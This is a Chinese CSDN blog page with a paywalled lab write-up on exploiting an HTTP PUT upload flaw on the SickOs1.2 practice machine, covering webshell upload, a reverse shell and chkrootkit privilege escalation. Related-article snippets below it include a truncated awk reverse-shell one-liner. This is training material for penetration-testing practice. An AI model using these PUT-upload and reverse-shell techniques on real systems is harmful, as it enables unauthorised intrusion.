靶机测试--SickOs1.2【PUT漏洞】

最新推荐文章于 2022-10-08 15:06:30 发布
最新推荐文章于 2022-10-08 15:06:30 发布
阅读量340 收藏 1
点赞数
分类专栏: 渗透测试靶机实战 文章标签: 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45742511/article/details/115416426
版权
本文详细介绍了如何利用PUT漏洞在SickOs1.2中进行文件上传、反弹shell以及提权操作。通过Burpsuite、curl和msfvenom等工具,探测服务器PUT支持,上传webshell并实现shell反弹。接着,通过find命令尝试提权,并学习了chkrootkit漏洞利用。总结了PUT漏洞利用的要点和提权技巧。
摘要由CSDN通过智能技术生成

目录

PUT漏洞

通过PUT请求方式,上传文件。

参考链接:https://www.cebnet.com.cn/20180810/102513443.html

信息收集

主机发现:
在这里插入图片描述

端口扫描:
在这里插入图片描述

目录扫描:
在这里插入图片描述

漏洞利用

一、探测服务器是否开启PUT方式

burpsuite探测
在这里插入图片描述
二、上传文件
1.burpsuite上传:

修改为PUT方式,并在存在PUT漏洞的的目录下创建文件及文件内容。
在这里插入图片描述

查看目录:
在这里插入图片描述
执行命令:
在这里插入图片描述

2.curl 命令上传:

curl -i -X PUT -H
最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
(Vulnhub练习)---SICKOS: 1.2渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-03 1999
文章目录(Vulnhub练习)-- SICKOS: 1.2渗透实战下载地址主机发现目标ip192.168.100.159信息收集nmap端口扫描指纹识别路径扫描漏洞挖掘PUT方法任意写文件漏洞使用nmap脚本进行扫描漏洞利用php一句话木马 + 蚁剑连接nc反弹shellmsf反弹shellmsf改为php反弹shell本地提权查看靶机的版本及内核信息查看/etc/cron*下所含的所有文件查看chkrootkit的版本搜索chkrootkit 0.49版本漏洞查看提权步骤提权步骤:将当前用户(www-da
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7192
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
ctf训练 中间件PUT漏洞
qq_43799246的博客
12-05 692
ctf训练 中间件PUT漏洞 中间件PUT漏洞介绍 中间件包括apache、tomcat、llS、weblogic等,这些中间件可以设置支持的HTTP方法。(HTTP方法包括 GET、POST、HEAD、DELETE、PUT、OPTIONS等) 每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应的目录。 直接上传shell,也可以从侧面反映PUT漏洞的严重危害性。 实验环境
PUT中间件上传漏洞
weixin_45007073的博客
01-13 2513
先介绍一下PUT上传漏洞的原理 我们常见的中间件有apache,tomcat,IIS,weblogic(其实就是web容器),这些中间件可以设置支持的HTTP方法。每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到对应的服务器上。 靶机搭建 链接:https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A 提取码:lsq0 漏洞复现 使用netd
PUT漏洞实战
qq_23347209的博客
06-06 620
发现开放了22和80端口 浏览器打开站点,大概是这样的↓ 发现敏感目录👇 并没有发现什么有用的信息 parrot选择owasp-zap进入 开始主动扫描👇 发现了存在X-Frame-Options Header Not Set漏洞 以使⽤⼀个透明的、不可见的iframe,覆盖在⽬标⽹页上,然后诱使⽤户在该⽹页上进⾏操作,通过调整iframe页⾯的位置,可以诱使⽤户恰好点击iframe页⾯的⼀些功能性按钮上,导致被劫持。【不过本靶机实验用不到,了解一下😄O(∩_∩)O】 关键:允许使用PU...
我的BurpSuite挖漏洞的一些技巧
hackzkaq的博客
08-09 3950
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 关于”从burp的使用到支付和暴破“,也有一期视频教程,可以文末扫码领取 关联阅读: Burpsuite技巧 | 之加密密码爆破、带验证码爆破 渗透测试神器|一文带你精通Burp 一.前言 用了好久低版本的Burp, 最近发现Burp有个全新的改动,所以重新配置一下,然后记录了自己的过程,就打算分享一下自己平时利用Burpsuite进行挖洞的一些技巧。 二.Burp安装与破解 访问官网直接下载Mac OS的安装版:https://ports
CTF-18.web安全PUT上传漏洞
最新发布
woo233的博客
10-08 1014
中间件包括apache、tomcat、 lIS、 weblogic等, 这些中间件可以设置支持的HTTP方法。(HTTP方法包括GET、POST、 HEAD、 DELETE、 PUT、 OPTIONS等)每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应的目录。直接上传shell,也可以从侧面反映PUT漏洞的严重危害性。
【vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 421
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
靶机渗透(九)SickOs1.2
qq_42180996的博客
05-07 2589
靶机SickOs1.2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.远程登录(22端口) 3.目录扫描(dirb) (三)获取shell 1.方法一:P...
用域名访问接口, get和post请求均正常,而put和delete请求均无法正常使用
热门推荐
相约黄昏后
07-12 1万+
问题描述:在内网环境下, 用IP访问接口均正常。但是在外网环境中用域名访问接口,get和post请求均正常,而put和delete请求均无法正常使用。
CTF-PUT上传漏洞
不知名白帽的博客
05-27 773
CTF-PUT上传漏洞,实验环境:kali(192.168.20.128),靶机(192.168.20.137)。进行信息探测,漏洞扫描未发现有效信息后,测试PUT漏洞,发现存在PUT漏洞,下载插件Poster(RESTClient),然后上传大马反弹shell
带范围限制的 HTTP PUT 请求语法
chaoslawful
01-05 1376
HTTP PUT 请求可以给出数据要保存到目标文件的那个区域内,相当于在写入文件时指定了起始偏移量。写入的区域可以尚不存在,这时的行为同文件指针移动到超过尾部时一样,都是在中间形成一个空洞,对应的目标文件也就变成了一个稀疏文件。 PUT 请求的区域范围是通过请求头中的 Content-Range 域来约束的,其简单的语法为: [quote]Content-Range: bytes [b][...
政务外网后端接口PUT和DELETE不通
weixin_45552405的博客
12-13 7593
政务外网后端接口PUT和DELETE不通 错误信息 解决思路 1,首先排查政务内网环境下接口是否能通 2、查看nginx反向代理问题 3、查看接口是否调通后端,后端是否有相应信息 4、排查端口是否对外开放 5、关闭防火墙试一试 6、查看是否所有接口都不通,还是部分接口不通 7、查看什么请求的接口不通 8、最终定位到只有PUT和DELETE请求不通 9、问题定位到查看相应解决方法 解决方案: 1.前端必须改代码,这个无法绕过,所有的PUT/DELETE请求,都要求改成POST; 所有的PUT请求,要携带He
文件上传之IIS—put漏洞
一个普普通通的博客
03-16 4713
iis—put漏洞
防火墙(ASA)高级配置之URL过滤、日志管理、透明模式
weixin_33720078的博客
09-24 1134
对于防火墙产品来说,最重要的一个功能就是对事件进行日志记录。本篇博客将介绍如何对ASA进行日志管理与分析、ASA透明模式的原理与配置、利用ASA防火墙的IOS特性实施URL过滤。一、URL过滤 利用ASA防火墙IOS的特性URL过滤可以对访问的网站域名进行控制,从而达到某种管理目的。 实施URL过滤一般分为以下三个步骤:(1)创建class-map(类映射...
CTF—攻防练习之HTTP—18PUT上传漏洞
mutou990的博客
07-31 1795
主机:192.168.56.103 靶机:192.168.56.105 中间件PUT漏洞 包括apache,tomcat,IIS等中间件设置支持的HTTP方法(get,post,head,delete,put等) 每一个开放了HTTP方法都有其对应功能,PUT方法可以直接从客户机上传文件到服务器,如果中间件开放了 HTTP中的PUT方法,那么就可以利用上传webshell到服务器对应目录 一、信息探测 扫描靶机端口: 然后常规方法nikto -host ,dirb探测敏感文件,owasp zap扫web漏
BurpSuite笔记
weixin_42695055的博客
08-17 473
BurpSuite笔记
反弹shell失败 原来是这个原因
梦想闹钟
08-31 6810
在学习反弹shell的相关知识时,尝试在kali2上使用反弹shell 提示没有/dev/tcp 这是怎么回事呢?我百度了一下,大部分的说法是这个目录是bash创建的一个虚拟目录,但还是没有解决问题,最后在谷歌上找到了解释 https://evilpan.com/2021/04/25/reverse-shell/ 因此还是使用awk命令一句话反弹shell awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell
My-cmsms靶机实战:ARP与Nmap扫描漏洞检测
My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键环节:主机发现和端口扫描。 首先,我们通过ARP协议进行主机发现(7.1.1)。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值